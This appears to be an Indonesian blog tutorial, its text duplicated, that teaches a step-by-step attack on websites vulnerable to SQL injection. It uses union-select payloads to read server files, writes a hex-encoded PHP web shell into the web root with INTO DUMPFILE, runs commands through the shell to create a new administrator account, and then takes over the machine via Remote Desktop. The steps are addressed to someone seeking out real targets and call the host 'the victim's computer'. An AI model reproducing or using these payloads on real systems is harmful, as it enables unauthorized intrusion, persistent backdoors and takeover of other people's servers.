Auhtor : kiddies_code
email : crasher_1412 [at] yahoo [com]
waduh mugkin ada sebagian yang sudah tahu masalah ini (SQL RemoteDekstop), jadi maaf aja yach kalau
saya sok tahu, buat para om tutor saya jangan diketawain y, maklum saya cuma script kiddie disini.
langsung aja yach, sebenarnya konsep dalam meremote dekstop dengan SQL sama saja, hanya saja ada yang
kita rubah sedikit syntak dari SQlnya.
===========
PERTAMA
===========
untuk langkah pertama, pastinya kita mencari web target yang vuln dengan sql injection, kalo masalah
pencarian dan dork saya serahkan pada kalian dan bisa bertanya pada Dosen Google,he5x, maklum tempat
kuliah w kadang diwarnet..Tongue
===========
KEDUA
===========
setelah mendapatkan web yang vuln dengan SQL Injection, lalu kita cari alamat IP dari web tersebut
(memudahkan kita dalam meremote dekstop,sebab dalam meremote,kita akan dimintai alamat IPnya)
===========
KETIGA
===========
nah udah dapetkan alamat IP web yang bersangkutan, setelah itu cari kolom yang bermasalahnya(Metode
SQL Injection), misalkan kita dapet kolom 1
192.168.0.1/index.php?=-1+union+select+1–
kemudian cari versinya
192.168.0.1/index.php?=-1+union+select+version()–
disini saya baru melakukan pada SQL yang versi 5.x
===========
KEEMPAT
===========
ganti kolom yang bermasalah dengan
192.168.0.1/index.php?=-1+union+select+load_file(‘c:/boot.ini’)–
perintah load_file(‘c:/boot.ini’) digunakan untuk memanggil informasi boot dalam komputer korban
===========
KELIMA
===========
setelah itu kita convert
system($_get['CMD'])
kedalam bentuk Ascii, saya sudah tahu pasti pada maleskan convertnya, kalo gitu saya kasih aja hasilnya
0x3c3f7068702073797374656d28245f6765745b5c27434d445c275d293b203f3e
===========
KEENAM
===========
ok kalo gitu sekarang kita buat file cmd.php dengan syntak SQL
192.168.0.1/index.php?=-1+union+select+0x3c3f7068702073797374656d28245f6765745b5c27434d445c275d293b203f3 e+into+dumpfile+’c:/xampp/htdocs/cmd.php’–
0x3c3f7068702073797374656d28245f6765745b5c27434d445c275d293b203f3e >> conversian dari
+into+dumpfile+ >> untuk membuat file kedalam server
c:/xampp/htdocs/cmd.php >> dari pesan error SQL(tanda ‘\’ diubah menjadi ‘/’), kalo dapet yang pk appserv maka C:/AppServ/www/cmd.php
===========
KETUJUH
===========
ubh URL menjadi
192.168.0.1/cmd.php?cmd=dir
maka akan terlihat atau keluar data-data yang ada pada drive c:/ komputer korban
==========
KEDELAPAN
===========
nih code yang w rada kurang ngerti, coz w gak ngerti dari mana asalnya, tapi w paham codenya buat apa
ketikan pada URL
192.168.0.1/cmd.php?cmd=net user kiddies 12345 /add
net user kiddies 12345 /add >> perintah diatas adalah untuk membuat username dan password baru dalam system komputer
192.168.0.1/cmd.php?cmd=net localgroup administrator kiddies /add
net localgroup administrator kiddies /add >> perintah ini untuk membuat username kita adalah administrator dalam system komputer
=========
KESEMBILAN
=========
ketikan pertintah pada run >> mstsc
=========
KESEPULUH
==========
komputer sudah ditangan anda, silahkan pergunakan dengan sebaik-baiknya dan bijak….
kalau cupu tutornya maaf banget dan kalau kurang lengkap POCnya w minta maaf juga, coz w sendiri ge belajar
makasihnya buat temen2 w yang mau belajar bareng…
email : crasher_1412 [at] yahoo [com]
waduh mugkin ada sebagian yang sudah tahu masalah ini (SQL RemoteDekstop), jadi maaf aja yach kalau
saya sok tahu, buat para om tutor saya jangan diketawain y, maklum saya cuma script kiddie disini.
langsung aja yach, sebenarnya konsep dalam meremote dekstop dengan SQL sama saja, hanya saja ada yang
kita rubah sedikit syntak dari SQlnya.
===========
PERTAMA
===========
untuk langkah pertama, pastinya kita mencari web target yang vuln dengan sql injection, kalo masalah
pencarian dan dork saya serahkan pada kalian dan bisa bertanya pada Dosen Google,he5x, maklum tempat
kuliah w kadang diwarnet..Tongue
===========
KEDUA
===========
setelah mendapatkan web yang vuln dengan SQL Injection, lalu kita cari alamat IP dari web tersebut
(memudahkan kita dalam meremote dekstop,sebab dalam meremote,kita akan dimintai alamat IPnya)
===========
KETIGA
===========
nah udah dapetkan alamat IP web yang bersangkutan, setelah itu cari kolom yang bermasalahnya(Metode
SQL Injection), misalkan kita dapet kolom 1
192.168.0.1/index.php?=-1+union+select+1–
kemudian cari versinya
192.168.0.1/index.php?=-1+union+select+version()–
disini saya baru melakukan pada SQL yang versi 5.x
===========
KEEMPAT
===========
ganti kolom yang bermasalah dengan
192.168.0.1/index.php?=-1+union+select+load_file(‘c:/boot.ini’)–
perintah load_file(‘c:/boot.ini’) digunakan untuk memanggil informasi boot dalam komputer korban
===========
KELIMA
===========
setelah itu kita convert
system($_get['CMD'])
kedalam bentuk Ascii, saya sudah tahu pasti pada maleskan convertnya, kalo gitu saya kasih aja hasilnya
0x3c3f7068702073797374656d28245f6765745b5c27434d445c275d293b203f3e
===========
KEENAM
===========
ok kalo gitu sekarang kita buat file cmd.php dengan syntak SQL
192.168.0.1/index.php?=-1+union+select+0x3c3f7068702073797374656d28245f6765745b5c27434d445c275d293b203f3 e+into+dumpfile+’c:/xampp/htdocs/cmd.php’–
0x3c3f7068702073797374656d28245f6765745b5c27434d445c275d293b203f3e >> conversian dari
+into+dumpfile+ >> untuk membuat file kedalam server
c:/xampp/htdocs/cmd.php >> dari pesan error SQL(tanda ‘\’ diubah menjadi ‘/’), kalo dapet yang pk appserv maka C:/AppServ/www/cmd.php
===========
KETUJUH
===========
ubh URL menjadi
192.168.0.1/cmd.php?cmd=dir
maka akan terlihat atau keluar data-data yang ada pada drive c:/ komputer korban
==========
KEDELAPAN
===========
nih code yang w rada kurang ngerti, coz w gak ngerti dari mana asalnya, tapi w paham codenya buat apa
ketikan pada URL
192.168.0.1/cmd.php?cmd=net user kiddies 12345 /add
net user kiddies 12345 /add >> perintah diatas adalah untuk membuat username dan password baru dalam system komputer
192.168.0.1/cmd.php?cmd=net localgroup administrator kiddies /add
net localgroup administrator kiddies /add >> perintah ini untuk membuat username kita adalah administrator dalam system komputer
=========
KESEMBILAN
=========
ketikan pertintah pada run >> mstsc
=========
KESEPULUH
==========
komputer sudah ditangan anda, silahkan pergunakan dengan sebaik-baiknya dan bijak….
kalau cupu tutornya maaf banget dan kalau kurang lengkap POCnya w minta maaf juga, coz w sendiri ge belajar
makasihnya buat temen2 w yang mau belajar bareng…
Tidak ada komentar:
Posting Komentar